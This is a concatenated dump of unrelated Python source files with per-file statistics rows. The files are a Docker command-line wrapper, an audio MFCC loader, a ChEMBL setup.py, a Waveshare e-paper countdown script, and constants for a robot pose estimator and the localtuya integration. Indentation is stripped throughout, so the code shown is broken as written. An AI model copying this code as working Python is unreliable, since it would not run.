container_details['NAMES'] = deepcopy(container_details['PORTS'])
container_details['PORTS'] = ''
container_list.append(container_details)
return container_list
def _synopsis(self, container_settings, container_status=''):
''' a helper method for summarizing container settings '''
# compose default response
settings = {
'container_status': container_settings['State']['Status'],
'container_exit': container_settings['State']['ExitCode'],
'container_ip': container_settings['NetworkSettings']['IPAddress'],
'image_name': container_settings['Config']['Image'],
'container_alias': container_settings['Name'].replace('/',''),
'container_variables': {},
'mapped_ports': {},
'mounted_volumes': {},
'container_networks': []
}
# parse fields nested in container settings
import re
num_pattern = re.compile('\d+')
if container_settings['NetworkSettings']['Ports']:
for key, value in container_settings['NetworkSettings']['Ports'].items():
if value:
port = num_pattern.findall(value[0]['HostPort'])[0]
settings['mapped_ports'][port] = num_pattern.findall(key)[0]
elif container_settings['HostConfig']['PortBindings']:
for key, value in container_settings['HostConfig']['PortBindings'].items():
port = num_pattern.findall(value[0]['HostPort'])[0]
settings['mapped_ports'][port] = num_pattern.findall(key)[0]
if container_settings['Config']['Env']:
for variable in container_settings['Config']['Env']:
k, v = variable.split('=')
settings['container_variables'][k] = v
for volume in container_settings['Mounts']:
system_path = volume['Source']
container_path = volume['Destination']
settings['mounted_volumes'][system_path] = container_path
if container_settings['NetworkSettings']:
if container_settings['NetworkSettings']['Networks']:
for key in container_settings['NetworkSettings']['Networks'].keys():
settings['container_networks'].append(key)
# determine stopped status
if settings['container_status'] == 'exited':
if not container_status:
try:
from subprocess import check_output, STDOUT
sys_command = 'docker logs --tail 1 %s' % settings['container_alias']
check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
settings['container_status'] = 'stopped'
except:
pass
else:
settings['container_status'] = container_status
return settings
def images(self):
'''
a method to list the local docker images
:return: list of dictionaries with available image fields
[ {
'CREATED': '7 days ago',
'TAG': 'latest',
'IMAGE ID': '2298fbaac143',
'VIRTUAL SIZE': '302.7 MB',
'REPOSITORY': 'test1'
} ]
'''
sys_command = 'docker images'
sys_output = self.command(sys_command)
image_list = self._images(sys_output)
return image_list
def ps(self):
'''
a method to list the local active docker containers
:return: list of dictionaries with active container fields
[{
'CREATED': '6 minutes ago',
'NAMES': 'flask',
'PORTS': '0.0.0.0:5000->5000/tcp',
'CONTAINER ID': '38eb0bbeb2e5',
'STATUS': 'Up 6 minutes',
'COMMAND': '"gunicorn --chdir ser"',
'IMAGE': 'rc42/flaskserver'
}]
'''
sys_command = 'docker ps -a'
sys_output = self.command(sys_command)
container_list = self._ps(sys_output)
return container_list
def network_ls(self):
'''
a method to list the available networks
:return: list of dictionaries with docker network fields
[{
'NETWORK ID': '3007476acfe5',
'NAME': 'bridge',
'DRIVER': 'bridge',
'SCOPE': 'local'
}]
'''
import re
gap_pattern = re.compile('\t|\s{2,}')
network_list = []
sys_command = 'docker network ls'
output_lines = self.command(sys_command).split('\n')
column_headers = gap_pattern.split(output_lines[0])
for i in range(1,len(output_lines)):
columns = gap_pattern.split(output_lines[i])
network_details = {}
if len(columns) > 1:
for j in range(len(column_headers)):
network_details[column_headers[j]] = ''
if j <= len(columns) - 1:
network_details[column_headers[j]] = columns[j]
network_list.append(network_details)
return network_list
def inspect_container(self, container_alias):
'''
a method to retrieve the settings of a container
:param container_alias: string with name or id of container
:return: dictionary of settings of container
{ TOO MANY TO LIST }
'''
title = '%s.inspect_container' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send inspect command
import json
sys_command = 'docker inspect %s' % container_alias
output_dict = json.loads(self.command(sys_command))
container_settings = output_dict[0]
return container_settings
def inspect_image(self, image_name, image_tag=''):
'''
a method to retrieve the settings of an image
:param image_name: string with name or id of image
:param image_tag: [optional] string with tag associated with image
:return: dictionary of settings of image
{ TOO MANY TO LIST }
'''
title = '%s.inspect_image' % self.__class__.__name__
# validate inputs
input_fields = {
'image_name': image_name,
'image_tag': image_tag
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# determine system command argument
sys_arg = image_name
if image_tag:
sys_arg += ':%s' % image_tag
# run inspect command
import json
sys_command = 'docker inspect %s' % sys_arg
output_dict = json.loads(self.command(sys_command))
image_settings = output_dict[0]
return image_settings
def rm(self, container_alias):
'''
a method to remove an active container
:param container_alias: string with name or id of container
:return: string with container id
'''
title = '%s.rm' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# run remove command
sys_cmd = 'docker rm -f %s' % container_alias
output_lines = self.command(sys_cmd).split('\n')
return output_lines[0]
def rmi(self, image_id):
'''
a method to remove an image
:param image_name: string with id of image
:return: list of strings with image layers removed
'''
title = '%s.rmi' % self.__class__.__name__
# validate inputs
input_fields = {
'image_id': image_id
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# send remove command
sys_cmd = 'docker rmi %s' % image_id
output_lines = self.command(sys_cmd).split('\n')
return output_lines
def ip(self):
'''
a method to retrieve the ip of system running docker
:return: string with ip address of system
'''
if self.localhost.os.sysname == 'Windows' and float(self.localhost.os.release) < 10:
sys_cmd = 'docker-machine ip %s' % self.vbox
system_ip = self.command(sys_cmd).replace('\n','')
else:
system_ip = self.localhost.ip
return system_ip
def search(self, image_name):
# run docker search
sys_command = 'docker search %s' % image_name
shell_output = self._handle_command(sys_command)
# parse table
from labpack.parsing.shell import convert_table
image_list = convert_table(shell_output)
return image_list
def build(self, image_name, image_tag='', dockerfile_path='./Dockerfile'):
# construct sys command arguments
from os import path
tag_insert = ''
if image_tag:
tag_insert = ':%s' % image_tag
path_root, path_node = path.split(dockerfile_path)
sys_command = 'docker build -t %s%s -f %s %s' % (image_name, tag_insert, path_node, path_root)
# determine verbosity
print_pipe = False
if self.verbose:
print_pipe = True
else:
sys_command += ' -q'
# run command
shell_output = self._handle_command(sys_command, print_pipe=print_pipe)
return shell_output
def save(self, image_name, file_name, image_tag=''):
sys_command = 'docker save -o %s %s' % (file_name, image_name)
if image_tag:
sys_command += ':%s' % image_tag
return self.command(sys_command)
def command(self, sys_command):
'''
a method to run a system command in a separate shell
:param sys_command: string with docker command
:return: string output from docker
'''
title = '%s.command' % self.__class__.__name__
# validate inputs
input_fields = {
'sys_command': sys_command
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
from subprocess import check_output, STDOUT, CalledProcessError
try:
output = check_output(sys_command, shell=True, stderr=STDOUT).decode('utf-8')
except CalledProcessError as err:
raise Exception(err.output.decode('ascii', 'ignore'))
return output
def synopsis(self, container_alias):
'''
a method to summarize key configuration settings required for docker compose
:param container_alias: string with name or id of container
:return: dictionary with values required for module configurations
'''
title = '%s.synopsis' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# retrieve container settings
container_settings = self.inspect_container(container_alias)
# summarize settings
settings = self._synopsis(container_settings)
return settings
def enter(self, container_alias):
'''
a method to open up a terminal inside a running container
:param container_alias: string with name or id of container
:return: None
'''
title = '%s.enter' % self.__class__.__name__
# validate inputs
input_fields = {
'container_alias': container_alias
}
for key, value in input_fields.items():
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# compose system command
from os import system
sys_cmd = 'docker exec -it %s sh' % container_alias
if self.localhost.os.sysname in ('Windows'):
sys_cmd = 'winpty %s' % sys_cmd
# open up terminal
system(sys_cmd)
def run(self, image_name, container_alias, image_tag='', environmental_variables=None, mapped_ports=None, mounted_volumes=None, start_command='', network_name='', run_flags=''):
'''
a method to start a local container
:param image_name: string with name or id of image
:param container_alias: string with name to assign to container
:param image_tag: [optional] string with tag assigned to image
:param environmental_variables: [optional] dictionary of envvar fields to add to container
:param mapped_ports: [optional] dictionary of port fields to map to container
:param mounted_volumes: [optional] dictionary of path fields to map to container
:param start_command: [optional] string of command (and any arguments) to run inside container
:param network_name: [optional] string with name of docker network to link container to
:param run_flags: [optional] string with additional docker options to add to container
:return: string with container id
NOTE: valid characters for environmental variables key names follow the shell
standard of upper and lower alphanumerics or underscore and cannot start
with a numerical value.
NOTE: ports are mapped such that the key name is the system port and the
value is the port inside the container. both must be strings of digits.
NOTE: volumes are mapped such that the key name is the absolute or relative
system path and the value is the absolute path inside the container.
both must be strings.
NOTE: additional docker options:
--entrypoint overrides existing entrypoint command
--rm removes container once start command exits
--log-driver sets system logging settings for the container
https://docs.docker.com/engine/reference/run
'''
title = '%s.run' % self.__class__.__name__
# validate inputs
input_fields = {
'image_name': image_name,
'container_alias': container_alias,
'image_tag': image_tag,
'environmental_variables': environmental_variables,
'mapped_ports': mapped_ports,
'mounted_volumes': mounted_volumes,
'start_command': start_command,
'network_name': network_name,
'run_flags': run_flags
}
for key, value in input_fields.items():
if value:
object_title = '%s(%s=%s)' % (title, key, str(value))
self.fields.validate(value, '.%s' % key, object_title)
# validate subfields
if environmental_variables:
for key, value in environmental_variables.items():
key_title = '%s(environmental_variables={%s:...})' % (title, key)
self.fields.validate(key, '.envvar_key', key_title)
value_title = '%s(environmental_variables={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.envvar_value', value_title)
else:
environmental_variables = {}
if mapped_ports:
for key, value in mapped_ports.items():
key_title = '%s(mapped_ports={%s:...})' % (title, key)
self.fields.validate(key, '.port_key', key_title)
value_title = '%s(mapped_ports={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.port_value', value_title)
else:
mapped_ports = {}
if mounted_volumes:
for key, value in mounted_volumes.items():
key_title = '%s(mounted_volumes={%s:...})' % (title, key)
self.fields.validate(key, '.mount_field', key_title)
value_title = '%s(mounted_volumes={%s:%s})' % (title, key, str(value))
self.fields.validate(value, '.mount_field', value_title)
else:
mounted_volumes = {}
# TODO verify image exists (locally or remotely) ???
# verify alias does not exist
for container in self.ps():
if container['NAMES'] == container_alias:
raise ValueError('%s(container_alias="%s") already exists. Try first: docker rm -f %s' % (title, container_alias, container_alias))
# verify network exists
network_exists = False
for network in self.network_ls():
if network['NAME'] == network_name:
network_exists = True
if network_name and not network_exists:
raise ValueError('%s(network_name="%s") does not exist. Try first: docker network create %s' % (title, network_name, network_name))
# verify system paths and compose absolute path mount map
absolute_mounts = {}
from os import path
for key, value in mounted_volumes.items():
if not path.exists(key):
raise ValueError('%s(mounted_volume={%s:...}) is not a valid path on localhost.' % (title, key))
absolute_path = path.abspath(key)
if self.localhost.os.sysname == 'Windows':
absolute_path = '"/%s"' % absolute_path
else:
absolute_path = '"%s"' % absolute_path
absolute_mounts[absolute_path] = '"%s"' % value
# compose run command
sys_cmd = 'docker run --name %s' % container_alias
for key, value in environmental_variables.items():
sys_cmd += ' -e %s=%s' % (key.upper(), value)
for key, value in mapped_ports.items():
sys_cmd += ' -p %s:%s' % (key, value)
for key, value in absolute_mounts.items():
sys_cmd += ' -v %s:%s' % (key, value)
if network_name:
sys_cmd += ' --network %s' % network_name
if run_flags:
sys_cmd += ' %s' % run_flags.strip()
sys_cmd += ' -d %s' % image_name
if image_tag:
sys_cmd += ':%s' % image_tag
if start_command:
sys_cmd += ' %s' % start_command.strip()
# run run command
output_lines = self.command(sys_cmd).split('\n')
return output_lines[0]
if __name__ == '__main__':
# test docker client init
from pprint import pprint
docker_client = dockerClient()
# test docker list methods
images = docker_client.images()
print(images)
containers = docker_client.ps()
print(containers)
networks = docker_client.network_ls()
print(networks)
remote_images = docker_client.search('alpine')
print(remote_images)
# # test docker run
# from labpack.records.settings import load_settings
# docker_config = load_settings('../../data/test_docker.yaml')
# container_id = docker_client.run(
# image_name=docker_config['image_name'],
# container_alias=docker_config['container_alias'],
# environmental_variables=docker_config['envvar'],
# mounted_volumes=docker_config['mounts'],
# mapped_ports=docker_config['ports'],
# start_command=docker_config['command']
# )
# print(container_id)
#
# # wait for container to start
# from time import sleep
# sleep(1)
# test docker synopsis
for container in containers:
settings = docker_client.synopsis(container['CONTAINER ID'])
pprint(settings)
# test enter and rm from separate script
print('************\nRUN python test_platforms_docker_enter.py to test enter and rm functionality' )
| 36.897338 | 182 | 0.561384 | 3,145 | 29,112 | 4.991097 | 0.128458 | 0.022934 | 0.012614 | 0.014907 | 0.401988 | 0.342804 | 0.288781 | 0.228069 | 0.212079 | 0.183411 | 0 | 0.006401 | 0.33457 | 29,112 | 788 | 183 | 36.944162 | 0.803892 | 0.208505 | 0 | 0.327354 | 0 | 0.002242 | 0.146633 | 0.016376 | 0 | 0 | 0 | 0.001269 | 0 | 1 | 0.049327 | false | 0.002242 | 0.049327 | 0 | 0.152466 | 0.033632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
413f75cca22078b8921f0960e0731176326021d4 | 947 | py | Python | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | classical_models/util_functions.py | leejaeka/sound_classifier | 121bc11522514ed45e5ad74c4c3ffdb0e87cd688 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import pandas as pd
def load_data(dataset='training', path='../data_processed/'):
return pd.read_pickle(path + dataset + '_set.pkl')
def process_files_to_mfccs(dataset='training', path='../data_processed/', target_column='mfccs'):
df = load_data(dataset=dataset, path=path)
labels, files, column_values = [],[],[]
for index, row in df.iterrows():
for f in range(row['mfccs'].shape[1]):
labels.append(row['Label'])
files.append(index)
column_values.append(row['mfccs'][:,f])
df = pd.DataFrame({'File_id': files, 'Label': labels, 'column_values': column_values })
#Here we make the lists inside the target column into independent columns, while keeping the file_id and label
features_df = pd.concat([df['column_values'].apply(pd.Series), df['File_id'], df['Label']], axis = 1)
features_df = features_df.set_index('File_id')
return features_df
| 37.88 | 114 | 0.669483 | 134 | 947 | 4.552239 | 0.432836 | 0.098361 | 0.04918 | 0.07541 | 0.104918 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002571 | 0.178458 | 947 | 24 | 115 | 39.458333 | 0.781491 | 0.1151 | 0 | 0 | 0 | 0 | 0.16368 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0.0625 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414012d7a8b9a151ce80cbbbd219f43643543cf6 | 1,395 | py | Python | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | 2 | 2017-12-02T12:14:10.000Z | 2020-09-30T17:49:37.000Z | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | null | null | null | setup.py | chembl/chembl_assay_matrix | f8f48e2fd22cde19f0bc6da3052e94952a5d7df3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'mnowotka'
import sys
try:
from setuptools import setup
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup
if sys.version_info < (2, 7, 3) or sys.version_info >= (2, 7, 7):
raise Exception('ChEMBL software stack requires python 2.7.3 - 2.7.7')
setup(
name='chembl-assay-network',
version='0.8.1',
author='Michal Nowotka',
author_email='mnowotka@ebi.ac.uk',
description='Python package generating compound co-occurance matrix for all assays from given document',
url='https://www.ebi.ac.uk/chembldb/index.php/ws',
license='CC BY-SA 3.0',
packages=['chembl_assay_network'],
long_description=open('README.rst').read(),
install_requires=[
'chembl-core-model>=0.8.3',
'numpy>=1.7.1',
'scipy',
],
include_package_data=True,
classifiers=['Development Status :: 2 - Pre-Alpha',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 2.7',
'Topic :: Scientific/Engineering :: Chemistry'],
zip_safe=False,
) | 32.44186 | 108 | 0.614337 | 168 | 1,395 | 5 | 0.642857 | 0.011905 | 0.047619 | 0.059524 | 0.038095 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025739 | 0.248029 | 1,395 | 43 | 109 | 32.44186 | 0.775024 | 0.030108 | 0 | 0.055556 | 0 | 0 | 0.451923 | 0.034024 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.138889 | 0 | 0.138889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41402626baceb0ad14ef7bcb1114108515c7b502 | 2,029 | py | Python | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | 6 | 2019-10-07T12:03:45.000Z | 2019-10-10T11:41:57.000Z | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | null | null | null | waveshare/countdown.py | WebReflection/countdown | 7ba452de33bbef4c6132c4af0071fe28f6f3e3bb | [
"0BSD"
] | null | null | null | #!/usr/bin/env python3
# ISC License
#
# Copyright (c) 2019, Andrea Giammarchi, @WebReflection
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE
# OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
import random
import os
import sys
sys.path.insert(1, os.path.realpath('./node_modules/filebus/python'))
# initialize the display
from waveshare_epd import epd2in13
epaper = epd2in13.EPD()
# they defined width and height upside down ^_^;;
width=epaper.height
height=epaper.width
# initialize the "canvas"
from PIL import Image, ImageFont, ImageDraw
# initialize the font
from font_fredoka_one import FredokaOne
font = ImageFont.truetype(FredokaOne, 42)
# initiate the FileBus channel
from filebus import FileBus
def ready(value = None):
print('ready')
epaper.init(epaper.lut_full_update)
epaper.Clear(0xFF)
epaper.init(epaper.lut_partial_update)
fb.send('ready', random.random())
def update(message = ''):
print('update: ' + message);
w, h = font.getsize(message)
x = (width - w) / 2
y = (height - h) / 2
img = Image.new("P", (width, height), 255)
draw = ImageDraw.Draw(img)
draw.text((x, y), message, font = font, fill = 0)
epaper.display(epaper.getbuffer(img.rotate(180)))
fb.send('update', random.random())
# use .js as channel input, and .python as channel output
fb = FileBus('.js', '.python')
fb.on('ready', ready)
fb.on('update', update)
# just wait for JS handshake
| 30.283582 | 79 | 0.73928 | 300 | 2,029 | 4.97 | 0.51 | 0.024145 | 0.021462 | 0.025486 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014035 | 0.15722 | 2,029 | 66 | 80 | 30.742424 | 0.857895 | 0.497782 | 0 | 0 | 0 | 0 | 0.075301 | 0.029116 | 0 | 0 | 0.004016 | 0 | 0 | 1 | 0.064516 | false | 0 | 0.225806 | 0 | 0.290323 | 0.064516 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
414211e54fff763958123b81d2506325421d7750 | 3,201 | py | Python | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | 1 | 2021-05-17T17:35:01.000Z | 2021-05-17T17:35:01.000Z | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | 1 | 2021-07-27T23:49:33.000Z | 2021-07-29T19:53:14.000Z | robotpose/constants.py | OSU-AIMS/RoPE-S3D | 0deed60b0c0b46324f9ce971bcf0b0b0af88ccf5 | [
"Apache-2.0"
] | null | null | null | # Software License Agreement (Apache 2.0 License)
#
# Copyright (c) 2021, The Ohio State University
# Center for Design and Manufacturing Excellence (CDME)
# The Artificially Intelligent Manufacturing Systems Lab (AIMS)
# All rights reserved.
#
# Author: Adam Exley
import numpy as np
import logging as log
MAX_LINKS = 7
PATH_JSON_PATH = r'data/paths.json'
JSON_LINK_FILE = r"\\marvin\ROPE\joint_states.json"
##################################### Crops
CROP_RENDER_WEIGHTING = [6,3,3,0,1,0] # Higher numbers indicate more weight on that joint for rendering
CROP_VARYING = 'SLUB' # Joints to vary for crop calculation
CROP_MAX_PER_JOINT = 50 # Max poses for a single joint
CROP_SEC_ALLOTTED_APPROX = 20 # Approx number of seconds allowed for each crop rendering stage calculation
CROP_PADDING = 10
##################################### Lookups
GPU_MEMORY_ALLOWED_FOR_LOOKUP = 0.1 # Depending on hardware, this my vary. ~10% seems to work, but anything ~25%+ will overallocate for calculations
LOOKUP_NAME_LENGTH = 5
LOOKUP_MAX_DIV_PER_LINK = 200
LOOKUP_JOINTS = 'SLU' # SL is also usable
LOOKUP_NUM_RENDERED = 6 # 3 or 4 for SL
##################################### Segmentation Models
MODELDATA_FILE_NAME = 'ModelData.json'
NUM_MODELS_TO_KEEP = 3 # If a model has more than this number of stored checkpoints, they will be deleted.
MODEL_NAME_LENGTH = 4
##################################### Wizard Settings
WIZARD_DATASET_PREVIEW = True # Set to false to reduce lag caused by dataset previewing
##################################### Verifier
VERIFIER_ALPHA = .7 # Weight to place on images in verifier
VERIFIER_SELECTED_GAMMA = -50 # Amount to add to R/G/B Channels of a selected image. Usually negative.
VERIFIER_SCALER = 1.5 # Scale factor of thumbnails. Overall scale is this divided by THUMBNAIL_DS_FACTOR
VERIFIER_ROWS = 4 # Rows of images present in Verifier
VERIFIER_COLUMNS = 4 # Columns of images present in Verifier
##################################### Datasets
VIDEO_FPS = 15 # Default video frames per second
THUMBNAIL_DS_FACTOR = 6 # Factor to downscale images by for thumbnails. Larger numbers yield smaller images
DEFAULT_CAMERA_POSE = [0, -1.5, .75, 0, 0, 0] # Base camera pose to fill new datasets with before alignment
##################################### Rendering
def default_render_color_maker(num:int):
"""Creates unique colors for rendering.
Parameters
----------
num : int
Number of colors to generate. Should be larger than the number of meshes expected to use.
For 6-axis robots, the minimum recommended number is 7.
Returns
-------
List[List]
num pairs of RGB triplets
"""
if num < 7:
log.warn('Fewer than 7 rendering colors are being generated. This may cause issues if a URDF with a 6+ axis robot is loaded.')
b = np.linspace(0,255,num).astype(int) # Blue values are always unique
g = [0] * b.size
r = np.abs(255 - 2*b)
colors = []
for idx in range(num):
colors.append([b[idx],g[idx],r[idx]])
return colors
DEFAULT_RENDER_COLORS = default_render_color_maker(7) # Increase if expecting to use more meshes/end effector | 34.793478 | 148 | 0.672602 | 460 | 3,201 | 4.552174 | 0.519565 | 0.015282 | 0.017192 | 0.016237 | 0.023878 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025573 | 0.181506 | 3,201 | 92 | 149 | 34.793478 | 0.773664 | 0.504842 | 0 | 0 | 0 | 0.026316 | 0.144338 | 0.024721 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.052632 | 0 | 0.105263 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4148771c5460032b6e6cf71a733f1a7a81a72d62 | 2,893 | py | Python | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | 18 | 2016-08-10T01:02:27.000Z | 2017-10-26T04:19:49.000Z | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | null | null | null | custom_components/localtuya/const.py | JonathanFerraz/home-assistant | 15cd52f5eff850f978949406071fbe98b882918a | [
"MIT"
] | 4 | 2017-04-20T19:41:21.000Z | 2017-05-16T17:10:05.000Z | """Constants for localtuya integration."""
ATTR_CURRENT = "current"
ATTR_CURRENT_CONSUMPTION = "current_consumption"
ATTR_VOLTAGE = "voltage"
CONF_LOCAL_KEY = "local_key"
CONF_PROTOCOL_VERSION = "protocol_version"
CONF_DPS_STRINGS = "dps_strings"
CONF_PRODUCT_KEY = "product_key"
# light
CONF_BRIGHTNESS_LOWER = "brightness_lower"
CONF_BRIGHTNESS_UPPER = "brightness_upper"
CONF_COLOR = "color"
CONF_COLOR_MODE = "color_mode"
CONF_COLOR_TEMP_MIN_KELVIN = "color_temp_min_kelvin"
CONF_COLOR_TEMP_MAX_KELVIN = "color_temp_max_kelvin"
CONF_COLOR_TEMP_REVERSE = "color_temp_reverse"
CONF_MUSIC_MODE = "music_mode"
# switch
CONF_CURRENT = "current"
CONF_CURRENT_CONSUMPTION = "current_consumption"
CONF_VOLTAGE = "voltage"
# cover
CONF_COMMANDS_SET = "commands_set"
CONF_POSITIONING_MODE = "positioning_mode"
CONF_CURRENT_POSITION_DP = "current_position_dp"
CONF_SET_POSITION_DP = "set_position_dp"
CONF_POSITION_INVERTED = "position_inverted"
CONF_SPAN_TIME = "span_time"
# fan
CONF_FAN_SPEED_CONTROL = "fan_speed_control"
CONF_FAN_OSCILLATING_CONTROL = "fan_oscillating_control"
CONF_FAN_SPEED_MIN = "fan_speed_min"
CONF_FAN_SPEED_MAX = "fan_speed_max"
CONF_FAN_ORDERED_LIST = "fan_speed_ordered_list"
CONF_FAN_DIRECTION = "fan_direction"
CONF_FAN_DIRECTION_FWD = "fan_direction_forward"
CONF_FAN_DIRECTION_REV = "fan_direction_reverse"
# sensor
CONF_SCALING = "scaling"
# climate
CONF_TARGET_TEMPERATURE_DP = "target_temperature_dp"
CONF_CURRENT_TEMPERATURE_DP = "current_temperature_dp"
CONF_TEMPERATURE_STEP = "temperature_step"
CONF_MAX_TEMP_DP = "max_temperature_dp"
CONF_MIN_TEMP_DP = "min_temperature_dp"
CONF_PRECISION = "precision"
CONF_TARGET_PRECISION = "target_precision"
CONF_HVAC_MODE_DP = "hvac_mode_dp"
CONF_HVAC_MODE_SET = "hvac_mode_set"
CONF_PRESET_DP = "preset_dp"
CONF_PRESET_SET = "preset_set"
CONF_HEURISTIC_ACTION = "heuristic_action"
CONF_HVAC_ACTION_DP = "hvac_action_dp"
CONF_HVAC_ACTION_SET = "hvac_action_set"
CONF_ECO_DP = "eco_dp"
CONF_ECO_VALUE = "eco_value"
# vacuum
CONF_POWERGO_DP = "powergo_dp"
CONF_IDLE_STATUS_VALUE = "idle_status_value"
CONF_RETURNING_STATUS_VALUE = "returning_status_value"
CONF_DOCKED_STATUS_VALUE = "docked_status_value"
CONF_BATTERY_DP = "battery_dp"
CONF_MODE_DP = "mode_dp"
CONF_MODES = "modes"
CONF_FAN_SPEED_DP = "fan_speed_dp"
CONF_FAN_SPEEDS = "fan_speeds"
CONF_CLEAN_TIME_DP = "clean_time_dp"
CONF_CLEAN_AREA_DP = "clean_area_dp"
CONF_CLEAN_RECORD_DP = "clean_record_dp"
CONF_LOCATE_DP = "locate_dp"
CONF_FAULT_DP = "fault_dp"
CONF_PAUSED_STATE = "paused_state"
CONF_RETURN_MODE = "return_mode"
CONF_STOP_STATUS = "stop_status"
DATA_DISCOVERY = "discovery"
DOMAIN = "localtuya"
# Platforms in this list must support config flows
PLATFORMS = [
"binary_sensor",
"climate",
"cover",
"fan",
"light",
"number",
"select",
"sensor",
"switch",
"vacuum",
]
TUYA_DEVICE = "tuya_device"
